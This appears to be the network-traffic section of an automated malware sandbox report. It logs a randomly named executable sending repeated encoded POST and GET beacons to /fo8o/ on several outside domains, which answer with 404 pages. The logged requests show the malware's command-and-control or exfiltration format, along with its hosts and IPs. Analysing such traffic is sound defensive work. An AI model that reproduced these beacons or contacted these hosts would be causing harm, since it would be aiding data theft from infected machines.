                                                                                    Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_lFvCFF1qxSaEiSC2Zshe5fpXOGFnnyTzACxwsZoHWW3uY42g9RxPvh3H6Cfl/Tn2oo/7/M4eq2DErri2E0h8Zw==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
                                                                                    Timestamp: Jan 7, 2025 15:34:31.104932070 CET | Bytes transferred: 1236 | Direction: IN
                                                                                    Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi1062ng for!"><link rel="icon" type="image/png" href="//img.
                                                                                    Jan 7, 2025 15:34:31.104943037 CET1236INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d
                                                                                    Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
                                                                                    Jan 7, 2025 15:34:31.104958057 CET1236INData Raw: 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e
                                                                                    Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
                                                                                    Jan 7, 2025 15:34:31.104974031 CET896INData Raw: 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c
                                                                                    Data Ascii: in-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet
                                                                                    Jan 7, 2025 15:34:31.104988098 CET1236INData Raw: 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68
                                                                                    Data Ascii: ement-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webar
                                                                                    Jan 7, 2025 15:34:31.105000973 CET1236INData Raw: 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63
                                                                                    Data Ascii: ter;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:1
                                                                                    Jan 7, 2025 15:34:31.105012894 CET1236INData Raw: 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f
                                                                                    Data Ascii: ontent-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px
                                                                                    Jan 7, 2025 15:34:31.105025053 CET1236INData Raw: 2e 33 73 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69
                                                                                    Data Ascii: .3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:
                                                                                    Jan 7, 2025 15:34:31.105133057 CET1236INData Raw: 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d
                                                                                    Data Ascii: d:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);tra
                                                                                    Jan 7, 2025 15:34:31.109899998 CET1044INData Raw: 65 61 72 63 68 62 6f 78 50 61 74 68 22 3a 22 2f 2f 77 77 77 2e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2e 70 68 70 22 2c 22 73 65 61 72 63 68 50 61 72 61 6d 73 22 3a 7b 22 73 65 73 22 3a 22 59 33 4a 6c 50 54 45 33 4d
                                                                                    Data Ascii: earchboxPath":"//www.rssnewscast.com/parking.php","searchParams":{"ses":"Y3JlPTE3MzYyNjA0NzEmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc3ZDNiNzZmMmI2NzUuNjAxOTQyNTYmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTEmc2Vzc2lvbj1pWU1MMmt1MnR3YmZqdD


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    13 | 192.168.2.5 | 49989 | 66.29.149.46 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:34:44.592056990 CET | 783 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                    Jan 7, 2025 15:34:45.210248947 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:45 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    14 | 192.168.2.5 | 49990 | 66.29.149.46 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:34:47.136085987 CET | 803 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                    Jan 7, 2025 15:34:47.750137091 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:47 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    15 | 192.168.2.5 | 49991 | 66.29.149.46 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:34:49.661007881 CET | 1820 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps= [TRUNCATED]
                                                                                    Jan 7, 2025 15:34:50.270564079 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:50 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    16 | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:34:52.196084023 CET | 520 | OUT | GET /fo8o/?FPJps=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&vVyTz=x4ZDmHH0 HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.techchains.info
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:34:52.925978899 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:52 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    17 | 192.168.2.5 | 49993 | 195.110.124.133 | 80 | 3724 | C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:34:58.018270969 CET | 801 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: FPJps=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                    Jan 7, 2025 15:34:58.703078032 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:34:58 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID: 18 | Source: 192.168.2.5:49994 | Destination: 195.110.124.133:80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:35:00.552124977 CET | 821 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77
                                                                                    Data Ascii: FPJps=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                    Jan 7, 2025 15:35:01.233527899 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:35:01 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID: 19 | Source: 192.168.2.5:49995 | Destination: 195.110.124.133:80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:35:03.084131002 CET | 1838 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 [TRUNCATED]
                                                                                    Data Ascii: FPJps=[TRUNCATED]
                                                                                    Jan 7, 2025 15:35:03.743637085 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:35:03 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID: 20 | Source: 192.168.2.5:49996 | Destination: 195.110.124.133:80 | PID: 3724 | Process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 7, 2025 15:35:05.612638950 CET | 526 | OUT | GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:35:06.335695028 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 07 Jan 2025 14:35:06 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
